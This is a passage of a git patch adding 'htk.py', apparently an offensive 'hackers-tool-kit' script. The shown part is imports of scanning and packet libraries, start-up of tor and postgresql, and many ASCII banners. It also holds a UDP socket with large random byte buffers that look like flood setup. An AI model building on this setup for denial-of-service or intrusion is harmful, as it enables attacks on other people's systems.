-#-------------------------------------------------------------------------------------------------# -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From 9c427e5dc8b425e2316428f1053abd16bea1b4b1 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Wed, 29 May 2019 01:06:54 +0100 Subject: [PATCH 158/214] Add files via upload --- htk.py | 3102 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 3102 insertions(+) create mode 100644 htk.py diff --git a/htk.py b/htk.py new file mode 100644 index 0000000..b96da38 --- /dev/null +++ b/htk.py @@ -0,0 +1,3102 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @unkn0wn_bali +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +#this is the loading screen \ the imports START# +#----------------------------------------------# +import os +print "Starting hackers-tool-kit... [ * ]-[0%]" +import platform +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[5%]" +import webbrowser +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[9%]" +import hashlib +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[14%]" +import subprocess +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[19%]" +import zipfile +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[23%]" +import colorama +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[25%]" +from modules import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[26%]" +import modules.colors +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[27%]" +import builtwith +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[29%]" +from urllib2 import urlopen +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[31%]" +from urllib2 import URLError +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[34%]" +from urllib2 import HTTPError +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[38%]" +from urllib import urlencode +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[39%]" +from plugins.DNSDumpsterAPI import DNSDumpsterAPI +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[41%]" +import whois +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[45%]" +import json +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[47%]" +from urlparse import urlparse +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[50%]" +from re import search, sub +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[55%]" +import cookielib +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[56%]" +import socket +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[59%]" +from scapy.all import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[60%]" +from threading import Thread, active_count +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[63%]" +import random +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[67%]" +import string +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[70%]" +import signal +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[73%]" +import ssl +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[79%]" +import argparse +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[83%]" +import sys +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[86%]" +import socks +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[89%]" +import mechanize +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[90%]" +import requests +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[94%]" +import time +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[96%]" +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[99%]" +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) +#COLOR VARIABLES START# +#---------------------# +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +#-------------------# +#COLOR VARIABLES END# + +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @tuf_unkn0wn\a'") +os.system("service tor start") +os.system("service postgresql start") +os.system("clear") +#----------------------------------------------# +#this is the loading screen \ the imports END# + + +#MAIN STARTING BANNER START# +#--------------------------# +def mainbanner1(): + os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") + print N+"""\033[34m + .............. \033[0mtype ? for help\033[34m + ..,;:ccc,. + ......''';lxO. + .....''''..........,:ld; + .';;;:::;,,.x, + ..'''. 0Xxoc:,. ... + .... ,ONkc;,;cokOdc',. + . OMo ':ddo. + dMc :OO; + 0M. .:o. + ;Wd + ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m + ,d0Odlc;,.. + ..',;:cdOOd::,. + .:d;.':;. + 'd, .' + ;l .. + .o + c + .' + .\033[92m + ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ + ██ ██ ▀▀▀██▀▀▀ ██ ██▀ + ██ ██ ██ ██▄██ + ████████ ██ █████ + ██ ██ █████ ██ █████ ██ ██▄ + ██ ██ ██ ██ ██▄ + ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m + ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ + ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ + ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + """.decode('utf-8') +def mainbanner2(): + print """ + type ? for help +\033[92m + ▄█ ▄█ ▄█ + ███ ███ ███ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███ ███ ███ + ███ ███ ███ + █▀ █▀ █▀ + + ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ + ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m + ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ + ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m + │ │ ││ ││───├┴┐│ │ + ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m +Created By @tuf_unkn0wn + """.decode('utf-8') +def mainbanner3(): + print """\033[91m + ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ + ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ + ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ + ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ + ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ + ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ + ░░ ░▒ ░ ░░ ░▒ ░ + ░ ░ ░ ░ + ░ ░ ░ ░ + \033[90m + + ████████████████████ + ██ ██\033[91m + ▒▒ ▒▒ + ░░ ░░ + ░ ░ + ░ ░\033[0m + +888 888 88888888888 888 d8P +888 888 888 888 d8P +888 888 888 888 d8P \033[1;36m +8888888888 888 888d88K +888 888 888 8888888b\033[0m +888 888 888888 888 888888 888 Y88b +888 888 888 888 Y88b +888 888 888 888 Y88b + Created By @tuf_unkn0wn On Instagram + type ? for help + """.decode('utf-8') +def mainbanner4(): + print P+""" + .S S. sdSS_SSSSSSbs .S S. + .SS SS. YSSS~S%SSSSSP .SS SS. + S%S S%S S%S S%S S&S + S%S S%S S%S S%S d*S + S%S SSSS%S S&S S&S .S*S + S&S SSS&S S&S S&S_sdSSS + S&S S&S S&S S&S~YSSY%b + S&S S&S S&S S&S `S% + S*S S*S S*S S*S S% + S*S S*S S*S S*S n& + S*S S*S S*S S*S wS& + SSS S*S S*S S*S 0 SS + h SP SP SP n + a Y Y Y k + c n + k e r s - t o o l - k i t by @tuf_u\033[0m + + type ? for help + """.decode('utf-8') +def mainbanner5(): + print R+""" + ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ + ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ + ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ + ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ + ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ + ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ + ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ + ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ + ░\033[0m + .,,,,,,,,,,.,,,.....,........................... + ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, + ..,......,.....,,.,........,,...........,,.,.... + ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ + ***********************//***/***//**/********** + ****************** ****************** @tuf_unkn0wn + *,*****,*,******** ***,************** + **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** type ? for help + ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, + ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, + ***********************************************\033[91m + + ▄████▄ █ ██ ▄▄▄█████▓ ██████ + ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ + ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ + ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ + ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ + ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ + ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ + ░ ░░░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ + ░ \033[0m + """.decode('utf-8') +def mainbanner6(): + print """ + |-|____________________ + /|_|_\ /__,''___ /____ /| + |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| + |``````|_________|`````| | + | \033[93m~~~~~~~~~~~~~~\033[0m | | + | .-/\-, | | + | _\\//_ | | + | \033[92m| /(_)|\033[0m | | + |\033[92m_______|_||.-.|_______\033[0m|/| + |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| + |\033[92m```````|_||:_)|```````\033[0m| | + | \033[92m|______| \033[0m| | + | ______ | | + | (__\033[90m24\033[0m__) | | + | ~~~~~~~~ | | + | By @tuf_unkn0wn | | + |______________________|/ + \033[91m + ) ( ) ( + ( /( )\ ) ( /( )\ ( ( ( + )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( + ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ + | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) + | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< + |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ + |___/ + \033[90m + ) + (\033[33m + _ \033[0m___________ \033[90m)\033[33m + [_[\033[0m___________\033[91m#\033[0m + type ? for help + """.decode('utf-8') +def mainbanner7(): + os.system("cat /root/hackers-tool-kit/tools/skull.txt") +def mainbanner8(): + print """ + type ? for help\033[91m + +@@@ /$$ /$$ @@@ +@@@ | $$ | $$ @@@ +@@! | $$ | $$ @@! +!@! | $$$$$$$$ !@! +!!@ | $$__ $$ !!@ +!!! | $$ | $$ !!! +!!: | $$ | $$ !!: +:!: |__/ |__/ :!: +@@@ @@@\033[94m +@@@ @@@ +@@! @@! +!@! /$$$$$$$$ !@! +!!@ |__ $$__/ !!@ +!!! | $$ !!! +!!: | $$ !!: +:!:---------------| $$---------------:!: +@@@ | $$ @@@ +@@@ | $$ @@@ +@@! |__/ @@! +!@! !@!\033[91m +!!@ !!@ +!!! /$$ /$$ !!! +!!: | $$ /$$/ !!: +:!: | $$ /$$/ :!: +@@@ | $$$$$/ @@@ +@@@ | $$ $$ @@@ +@@! | $$\ $$ @@! +!@! | $$ \ $$ !@! +!!@ |__/ \__/ !!@ +!!! !!! +!!: !!: +:!: :!:\033[92m + :: :: +: @tuf_unkn0wn :\033[0m +""" +def mainbanner9(): + print """ +\033[91m╔\033[0m██████████████████████████████████████████████████████████████████\033[91m═╗ +║ ║ +\033[33m║ ║ +║\033[0m ▄▀▀▀▀▄ ▄▀▀▄ ▀▀▄ ▄▀▀▀▀▄ ▄▀▀▀█▀▀▄ ▄▀▀█▄▄▄▄ ▄▀▀▄ ▄▀▄ \033[33m║ +\033[93m║\033[0m █ █ ▐ █ ▀▄ ▄▀ █ █ ▐ █ █ ▐ ▐ ▄▀ ▐ █ █ ▀ █ \033[93m║ +║\033[0m ▀▄ ▐ █ ▀▄ ▐ █ █▄▄▄▄▄ ▐ █ █ \033[93m║ +\033[92m║\033[0m ▀▄ █ █ ▀▄ █ █ █ ▌ █ █ \033[92m║ +║\033[0m █▀▀▀ ▄▀ █▀▀▀ ▄▀ ▄▀▄▄▄▄ ▄▀ ▄▀ \033[92m║ +\033[1;36m║\033[0m ▐ █ ▐ █ █ ▐ █ █ \033[1;36m║ +║\033[0m ▐ ▐ ▐ ▐ ▐ \033[1;36m║ +\033[94m║\033[0m ▄▀▀█▄▄ ▄▀▀▀▀▄ ▄▀▀▄ ▄▀▀▄ ▄▀▀▄ ▀▄ \033[94m║ +║\033[0m █ ▄▀ █ █ █ █ █ ▐ █ █ █ █ █ \033[94m ║ +\033[34m║\033[0m ▐ █ █ █ █ ▐ █ █ ▐ █ ▀█ \033[34m║ +║\033[0m █ █ ▀▄ ▄▀ █ ▄ █ █ █ \033[34m║ +\033[95m║\033[0m ▄▀▄▄▄▄▀ ▀▀▀▀ ▀▄▀ ▀▄ ▄▀ ▄▀ █ \033[95m║ +║\033[0m █ ▐ ▀ █ ▐ \033[95m║ +\033[35m║\033[0m ▐ ▐ \033[35m║ +║ ║\033[1;31m +╚═\033[0m█████████████████████████████████████████████████████████████████\033[1;31m═╝\033[0m + type ? for help + """.decode('utf-8') + +def mainbanner10(): + print """\033[0m + ░░░▓█▒░▒▒▒▓▓░ + ░░░░░▓▓░▒▓▓▓▓▓▓▓▓▓▓▓█░░░░ + ░░█▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░ + ░░█▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░░ + ░░░░ ░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██░░ ░░░░ + ░░░░░░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓████████▒░░ ░░▓▒▒▒▒▓░░ + ░▓░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████▓░░░░░▒▓▓▓▓▓▓███████ + ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█████████████████████████████████░░░░░░░ + ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓██████████████████████████████████░ + ░█▓▓▓██████████▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████████████████████▒░ + ░▒▓▓▓████░░░░░░░░░░░░░▒▓███████████████████████████████████████░░ + ░▓▓▓███▒▒░░░░░░░░░░░░░░░░░░░░▒██▓██████████████████████████████░░ + ░█▓▓███░░░░░░░░░░░░░░░░░░░░░░░░░░░▒███████████████████████████▓░ + ░█▓▓███▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░█████████████████░░░░░░░░░ + ░░▓▓████░░░░░░░░░░░░░░░░░░░░████▓░░░░░░░░█████████████▓░ + ░█▓█████░░░░░░░░░░░░░░░░░▒░████████░░░░░░░████████████░░ + ░░▒▓█████░░░░▒░▓████░░░░░░▒░█████████▓░░░░░███████████▓░░░░░ + ░░▓▒▓█████░░░▒░▓██████░░░░░▒░▓█████████░░░░░▒██████████░░▒▒▓░ + ░░█▒▓▓████▒░░░░███████▓░░░░░▒░░████████▓░░░░▒████████░▓░▓▓░▓▓░░░ + ░░░▒▓▓▓████░░░░▓██████▓░░░░░░▒░░░▓█████░░░░░███████▓░▓▓▓▓▓▓▒▒░░░ + ░▒▒▓▓████░░▒░░██████░░░░░░░░░▒░░░░░░▒░░░░░████▓░▒▓▓▓▓▓░░░▒▒▒░▒░ + ░░▓▓████░░░▒░░▒███░░▒▓▒▒█▓░░░░░░░░░░░░░▒██▓▒▓▓▓▓▓▓▒░░░░░░▒▒▒▒▒░░ + ░░░░████░░░░░░░░░░░░░█░░▓█▓░░░░██████████▒▒▓▓▓▓░░░░░▒░░░░░▒▒▒▒▒░ + ░░░░░░ ░░████░░░░░░░░░░░░░░░░░░░░░░███████▓▒▓▓░░░░░░░ ░░░░░░░▒▒▒░▒░ + ░▒░░▒░░░▒░▒█████▓▒░▒█░░░░░░░░░░░░░░░░███▓▒▓▒░░ ░▒░░░░▒▒▒░░░░ + ░░▒░▒░░░░░░░██████████░░░░░░▒░░░▒░░▒▒▒▒▒▒▒░░░ ░▒░░░░▒▒░▒░░ + ▒░░░░░▒▒▒░░░░░░██████░░▒▒▒▒▒▒▒▒▒▓█▓▓▒▒▓▓▓█░ ░░▒░░░░▒▒▒░░ + ░░░░░░▒▒░░░░ ░░▓▓▓▓▓▓▓█▓▓▒▒▓▓█▓▓▓▓▓█ \033[92m@tuf_unkn0wn\033[0m ░░░░░░░▒░░░ + ░░▒░░░░░▒▓█ ░▒▒▓▓▓▓█▓█▓▓▒▒▓▓██▓▓▓▓▓▓█ \033[94mtype ? for help\033[0m ░░░░░▒▒░░ + ░▒░░░░█▓██▒░▒▓▓██▓▒▒▒▒▓▒▓▓████▓▓▓▓▓██▒ ▒░░░░░▒░░ + ░░▓▒█▓▓▓▓▓▓▓██▓▒▒░▒▒▒▒█▓▓███▓▓▓▓▓▓█░ ▒░░░░▒░ + ░▒███▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒░▒████▓▓▓▓▓▓▒░ ▒░░░░░ + ░████▓▓▓▓▓▓▓▒▓▓▓▓█▒▒░░▒░█▓█▓█▓████░ ▒░░▒░░ + ░▓██▓▓▓▓▓▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▓▓█▓▓▓▓██▒░ ░░▒░ + ░░██▓▓▒▓▓██▓▓▓▓▓▓▓▓▓████▓▓▓▓█▓▓█░░░ + ░██▓▓███▒▓▓▓▓▓▓▓▓▓█████▓██▓██░░ + ░░█▓█░░ ░▒▒▓▓▓▓▓▓▓▓▓███▓██▓█░ + ▓█░ ░█▓▓▓▓▓▓▓▓▓████▓███░ ░ + ░█▓▓▓▓▓▓███████▓██▓██░ + ░██▓▓▓████████████████░░░ + ░▓▓▓▓▓███████▓█▓████████░ ░░░ + ░░░█▓█████████████████████████▓▓▓▒░░░░░░ + ░░░▒█▓█▓██████████████████████▓███████████████░░░░░░░░░ + ▓█▒▓▓▓▓▓▓█████████████████████████████████████████████████░ + ░█▓▓▓▓▓▓▓▓▓█████████████████████████████████████▒░░░ ░ ░░░░ + ░░▓█▓█▓█████████████████████████████░░ + \033[0m""".decode('utf-8') +def mainbanner11(): + print """\033[91m + ██████╗ ██████╗ ██████╗ + ██╔════╝ ██╔════╝ ██╔════╝ + ███████╗ ███████╗ ███████╗ + ██╔═══██╗██╔═══██╗██╔═══██╗ + ╚██████╔╝╚██████╔╝╚██████╔╝ + ╚═════╝ ╚═════╝ ╚═════╝ + ░░░░ ░░░░░ + ░▒███████▓▒░░ ░░░████████▓░░░ + ░▓████████████▒░░ ░░█████████████░░ + ▒▓░ ░░████████░░ ░░████████░░░ ░░▒█░ + ░ ░██████▒░ ░░░░███████ ░░ + ░░███████░░ ░░██████▓░ + ░███████░░ ░▒██████▒ + ░░░░ ░░███████░░░███████▒░ ░░░ + ░░░░░ ░░░███████░████████░░░ ░░░ ░░░░ + ░░▓████▓▒░░░░▒▒███████████████░░░░░░░▒▓████░ ░ + ░▒██████████████▒████████▒██████████████░░ + ░░██████████████▒░███▒▒▒█████████████░░ + ░░░░▓████████░█░▓▓▒████████▒░░░░░ + ░░████████▓░██░████████▒░░░ + ░░▒██████░▒▒░░▒░░██████░ + ░░█████████▓░█░████▓███▓░ + ░▒█▓░▒██████▒███████░░█▓░ + ░░░███████████████████▓░░ + ░▒▓████████████████▒░ + ░░▒███████████████▓▒░ + ░▒█████▓██████░░ + ░██████████░ + @tuf_unkn0wn ░█████████▒ type ? for help + █████████░░ + ░░████████░░ + ░▓█████▓░ + ░▓████▒░ + ░░████░ + ░░░▒██░░ + ░█▓░ + ░░▓░░ + ░░░░░ + ░░ + \033[0m""".decode('utf-8') +def mainbanner12(): + print """\033[91m + + +██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ +██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ +██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') +def mainbanner13(): + print """\033[92m + + +██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ +██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ +██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') +def mainbanner14(): + print """\033[34m + + +██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ +██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ +██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') +def mainbanner15(): + print """\033[93m + __ _ + _wr"" "-q__ + _dP 9m_ + _#P 9#_ + d#@ \033[92mtype ? for help\033[93m 9#m + d## ### + J### ###L + {###K J###K + ]####K ___aaa___ J####F + __gmM######_ w#P"" ""9#m _d#####Mmw__ + _g##############mZ_ __g##############m_ + _d####M@PPPP@@M#######Mmp gm#########@@PPP9@M####m_ + a###"" ,Z"#####@" '######"\g ""M##m + J#@" 0L "*## ##@" J# *#K + #" `# "_gmwgm_~ dF `#_ +7F "#_ ]#####F _dK JE +] *m__ ##### __g@" F + \033[92m@tuf_unkn0wn\033[93m "PJ#####LP" \033[92mhackers-tool-kit\033[93m + ` 0######_ ' + _0########_ + . _d#####^#####m__ , + "*w_________am#####P" ~9#####mw_________w*" + ""9@#####@M"" ""P@#####@M"" +\033[92m + ██░ ██ ▄▄▄█████▓ ██ ▄█▀ + ▓██░ ██▒▓ ██▒ ▓▒ ██▄█▒ + ▒██▀▀██░▒ ▓██░ ▒░▓███▄░ + ░▓█ ░██ ░ ▓██▓ ░ ▓██ █▄ + ░▓█▒░██▓ ▒██▒ ░ ▒██▒ █▄ + ▒ ░░▒░▒ ▒ ░░ ▒ ▒▒ ▓▒ + ▒ ░▒░ ░ ░ ░ ░▒ ▒░ + ░ ░░ ░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░\033[0m + """.decode('utf-8') +def mainbanner16(): + print """\033[91m + :PB@Bk: + ,jB@@B@B@B@BBL. + 7G@B@B@BMMMMMB@B@B@Nr + :kB@B@@@MMOMOMOMOMMMM@B@B@B1, + :5@B@B@B@BBMMOMOMOMOMOMOMM@@@B@B@BBu. + 70@@@B@B@B@BXBBOMOMOMOMOMOMMBMPB@B@B@B@B@Nr + G@@@BJ iB@B@@ OBMOMOMOMOMOMOM@2 B@B@B. EB@B@S + @@BM@GJBU. iSuB@OMOMOMOMOMOMM@OU1: .kBLM@M@B@ + B@MMB@B 7@BBMMOMOMOMOMOBB@: B@BMM@B + @@@B@B 7@@@MMOMOMOMM@B@: @@B@B@ + @@OLB. BNB@MMOMOMM@BEB rBjM@B + @@ @ M OBOMOMM@q M .@ @@ + @@OvB B:u@MMO\033[31mMOMMBJiB .BvM@B + @B@B@J 0@B@MMOMOMOMB@B@u q@@@B@ + B@MBB@v G@@BMMMMMMMMMMMBB@5 F@BMM@B + @BBM@BPNi LMEB@OMMMM@B@MMOMM@BZM7 rEqB@MBB@ + B@@@BM B@B@B qBMOMB@B@B@BMOMBL B@B@B @B@B@M + J@@@@PB@B@B@B7G@OMBB. ,@MMM@qLB@B@@@BqB@BBv + iGB@,i0@M@B@MMO@E : M@OMM@@@B@Pii@@N: + . B@M@B@MMM@B@B@B@MMM@@@M@B + @B@B.i@MBB@B@B@@BM@::B@B@ + B@@@ .B@B.:@B@ :B@B @B@O + :0 r@B@ B@@ .@B@: P: + vMB :@B@ :BO7 + ,B@B\033[0m + + \033[32m╔═══\033[93m+\033[0mHackers-Tool-Kit\033[93m+\033[32m════╗\033[0m + ███████████████████████████ + type █?█ for help + ███ + \033[31m▄▄ ▄▄ \033[0m███\033[31m ▄▄ ▄▄▄ + ██ ██ \033[0m███\033[31m ██ ██▀ + ██ ██ \033[0m███\033[31m ██▄██ + ████████ \033[0m███\033[31m █████ + ██ ██ \033[0m███\033[31m ██ ██▄ + ██ ██ \033[0m███\033[31m ██ ██▄ + ▀▀ ▀▀ 